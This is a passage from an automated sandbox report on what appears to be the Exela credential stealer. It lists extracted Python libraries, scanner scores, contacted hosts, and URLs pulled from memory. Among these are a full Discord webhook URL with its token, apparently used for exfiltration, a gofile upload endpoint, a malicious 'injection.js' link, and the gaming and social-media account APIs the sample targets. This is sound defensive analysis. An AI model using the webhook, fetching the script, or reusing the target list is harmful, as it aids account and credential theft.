            C:\Users\user\AppData\Local\Temp\_MEI80682\_socket.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_sqlite3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_ssl.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\_uuid.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_helpers.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_parser.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_writer.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_websocket.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\frozenlist\_frozenlist.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\libcrypto-1_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\libffi-8.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\libssl-1_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\multidict\_multidict.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\pyexpat.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\python3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\python311.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\select.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\unicodedata.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI80682\yarl\_quoting_c.cp311-win_amd64.pyd0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://tiktok.com/0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg0%Avira URL Cloudsafe
            https://discord.com/api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY00%Avira URL Cloudsafe
            http://crl.ver)0%Avira URL Cloudsafe
            https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/justforExela/injection/main/injection.js100%Avira URL Cloudmalware
            https://filepreviews.io/0%Avira URL Cloudsafe
            https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba0%Avira URL Cloudsafe
            https://discord.com/api/v8/users/0%Avira URL Cloudsafe
            https://raw.githubusercontent.com/justforExela/injection/main/injection.js0A0%Avira URL Cloudsafe
            https://discord.com/api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_Ba0%Avira URL Cloudsafe
            https://mahler:8092/site-updates.py0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            store8.gofile.io
            206.168.191.31
            truefalse
              high
              discord.com
              162.159.128.233
              truefalse
                unknown
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  api.gofile.io
                  51.38.43.18
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://discord.com/api/webhooks/1232453561850531851/OBetju49bFsNbzWeG3Y_1O_or46pmBaTOUd7HjjHcO5X_BaLZ2C-YJ8xGzkF6VbqbsY0false
                    • Avira URL Cloud: safe
                    unknown
                    https://store8.gofile.io/uploadFilefalse
                      high
                      http://ip-api.com/jsonfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.attrs.org/en/stable/why.html#data-classes).SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSIONSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmpfalse
                            high
                            https://account.riotgames.com/api/account/v1/userSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://accounts.reddit.com/api/access_tokenSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999597567.000002DCD0850000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999238737.000002DCD0640000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/pyca/cryptography/issues/8996SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmpfalse
                                    high
                                    https://gofile.io/d/mn2lNW)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/python-attrs/attrs/issues/251SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989764898.000002DCCF597000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969997805.000002DCCF596000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://tiktok.com/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/aio-libs/aiohttp/discussions/6044SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997316180.000002DCCFD00000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000003B.00000003.1758408950.000001B777B03000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B54000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B67000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B48000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://t.me/ExelaStealerP5SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              http://python.orgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1995329450.000002DCCF990000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                http://python.org:80SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1995329450.000002DCCF990000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1661328748.000002DCCD0E5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662491897.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971643797.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969728459.000002DCCD0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972101982.000002DCCD0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986072702.000002DCCD0DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662654764.000002DCCD0C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/sponsors/hynekExela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/pyca/cryptography/actions?query=workflow%3ACISecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654181174.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828658732.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://oauth.reddit.com/api/v1/meSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://i.hizliresim.com/6t31tw2.jpgpSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.apache.org/licenses/LICENSE-2.0SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1653924783.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1654069044.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1653993804.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828354705.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828510059.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1828426527.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989619337.000002DCCF540000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670767651.000002DCCED27000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000003B.00000003.1758408950.000001B777AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/python-attrs/attrs/issues/1200)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652743092.000001FC75816000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827086574.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784B4000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/python-attrs/attrs)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.attrs.org/)SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://twitter.comSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://twitter.com/homeSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://gql.twitch.tv/gql:SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://docs.python.org/3/library/subprocess#subprocess.Popen.killSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990622954.000002DCCF730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://github.com/quicaxd/Exela-V2.0/Exela-V2.00SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://github.com/python-attrs/attrs/issues/136SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670055005.000002DCCF63B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1968238543.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989717007.000002DCCF57B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1984324624.000002DCCF57A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670503006.000002DCCF5DD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970219696.000002DCCF53F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976604985.000002DCCF578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&baSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://i.hizliresim.com/8po0puy.jfifSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://peps.python.org/pep-0205/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986993183.000002DCCEE10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodeSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990622954.000002DCCF730000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&apSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1997146489.000002DCCFBE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000003B.00000003.1758408950.000001B777B22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://json.orgSecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670341282.000002DCCEF78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://zopeinterface.readthedocs.io/en/latest/SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1979336001.000002DCCF0DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969024366.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1956504995.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969507113.000002DCCF0C2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1988968795.000002DCCF0E0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1887859569.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976001517.000002DCCF0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1733430816.000002DCCF075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
